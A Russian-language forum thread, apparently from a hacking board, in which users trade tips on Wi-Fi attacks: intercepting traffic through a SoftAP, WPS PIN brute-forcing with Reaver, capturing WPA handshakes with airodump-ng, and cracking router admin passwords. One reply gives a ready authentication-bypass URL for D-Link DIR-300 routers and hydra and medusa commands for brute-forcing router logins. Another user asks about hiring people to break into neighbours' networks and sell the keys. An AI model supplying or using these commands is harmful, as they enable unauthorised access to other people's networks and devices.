Если в ПК вставить Wi-Fi адаптор (PCI, PCI-Express или USB) и настроить его в режиме SoftAP, то можно использовать программу для перехвата пакетов между созданной SoftAP и устройствами, которые к ней подключены, для этого в Windows очень удобно использовать программу NetResident, которая вытягивает данные из собранных пакетов и преобразует их к виду понятному пользователю этой программы. Но есть один существенный минус - NetResident не отображает данные отправленные через https протокол. Существует ли подобная программу для Linux, чтоб она была способна перехватывать трафик через https или хотябы работать как NetResident?
Intel(R) Centrino(R) Wireless-N 2200 root@bt:~# lspci -vvv -s 04:00.0 04:00.0 Network controller: Intel Corporation Device 0891 (rev c4) Subsystem: Intel Corporation Device 4222 Control: I/O- Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx- Interrupt: pin A routed to IRQ 18 Region 0: Memory at f3900000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 00000000fee0f00c Data: 4191 Capabilities: [e0] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s <512ns, L1 unlimited ExtTag- AttnBtn- AttnInd- PwrInd- RBE+ FLReset+ DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ FLReset- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq+ AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 <4us, L1 <32us ClockPM+ Suprise- LLActRep- BwNot- LnkCtl: ASPM L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM+ AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [100] Advanced Error Reporting <?> Capabilities: [140] Device Serial Number f8-31-5e-ff-ff-36-4e-9c Kernel modules: iwlwifi
Тут внизу страницы список ссылок, выбираешь под свою карту (Centrino(R) Wireless-N 2200), скачиваешь, распаковываешь. Далее делаешь #cp iwlwifi-*.ucode /lib/firmware (из папки с распакованными файлами) После перезагрузки карта должна заработать. Однако, если у тебя backtrack грузится с флешки, то "кина не будет", т.к. файлы на флешку не сохраняются, и после перезагрузки они пропадут. Тут два варианта: либо ставить систему на жесткий диск, чтобы файлы сохранялись, либо попробовать перезагрузить модуль для wifi. Для этого делаешь: #rmmod iwlwifi #modprobe iwlwifi Если на первую команду ответ - ошибка, то скидывай выхлоп сюда, будем смотреть. Если ошибки нет, и после второй команды ноут не завис - то делай #iwconfig - карта должна появиться в списке wlan интерфейсов.
Под Win больше и нечем ловить, т.к. все остальное под виндами базируется на драйверах от Comwiev . Так что, либо на виртуалку ставь линушные сборки типа BackTrack 5 или Xyaopan OS, либо используй их на live-CD/ live USB.
Направьте плиз , где посмотреть значения параметров на Minidwep . Пользую Xiaopan live usb В первую очередь нужно как стартовать сессию не с начала а с определенного значения кода WPS.
Может я что то не так делаю не получаеться у меня фильтр заюзать -t <OPN|WEP|WPA|WPA1|WPA2>, --encrypt <OPN|WEP|WPA|WPA1|WPA2> Пишу : airodump-ng --encrypt WPA , подскажите или поправте меня пожалуйста
Какой командой в Ривере задать начальный пин WPS, с которого он начнет перебор. -p задает конкретный пин который только и проверяется, а нужен задать стартовый пин
Wireshark При переходе Capture > Interfaces выдает ошибку "There are no interfaces on which a capture can be done" Ставил на машину(Win8x86) и ноут(Win7x86), одинаковая проблема. Как быть?
взлом пароля Wi-fi роутера ( админка роутера ) какие есть программы или как обойти пароль DLink DIR 300 Hardware Version : B1 Firmware Version : 2.02
Есть например обход аутентификации, без ввода пароля админа в веб морде: http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 Во всех вкладках поставлять в конце строки: ?NO_NEED_AUTH=1&AUTH_GROUP=0 Брут паса к веб морде "гидрой" / "медузой" обсуждался где-то в темах на Ачате. Поиск в помощь. UPD: Вот нашел пару примеров брута админки web- морды роутера с помощью данных программ: hydra -l admin -P pass.txt -4 -t 1 -V -f 192.168.0.1 http hydra -l admin -P pass.txt -4 -t 1 -V -f 192.168.1.1 -m /userRpm/StatusRpm.htm http medusa -h 192.168.1.1 -u admin -p admin -f -v 6 -M http
Всем привет, обрисую проблему. Руководствовался этой статьёй. Всё закачал, установил на USB, загрузился. Делал всё по инструкции (разве что авторизация не понадобилась), а затем: и Что нужно сделать?
Я думаю, это не совсем то, что мне нужно. А кроме того, в моем районе нет ничего на этом сайте. Меня больше интересуют не публичные точки, м ребята, которые сетки вскрывают. Скажем, у меня в доме 2-3 десятка сеток ноут ловит. Есть люди, которые могут приехать и попробовать войти в эти сетки, а потом просто продать ключи? Такая услуга бывает?
Вы запустили перевели свою карту в режиме monitor mode, Это всего лиш первый шаг на пути к перехвату хендшейка. дальше запускайте airodump-ng (airodump-ng mon0) Еще можно до кучи убить процесс который может мешать работе airodump-ng (Команда kill с указанием PID процесса , в данном случае судя по скрину это: kill 4335). Далее выбирайте сетку с подключенными клиентами и ловите хендшейк. Перечитайте статью - там все понятно написано.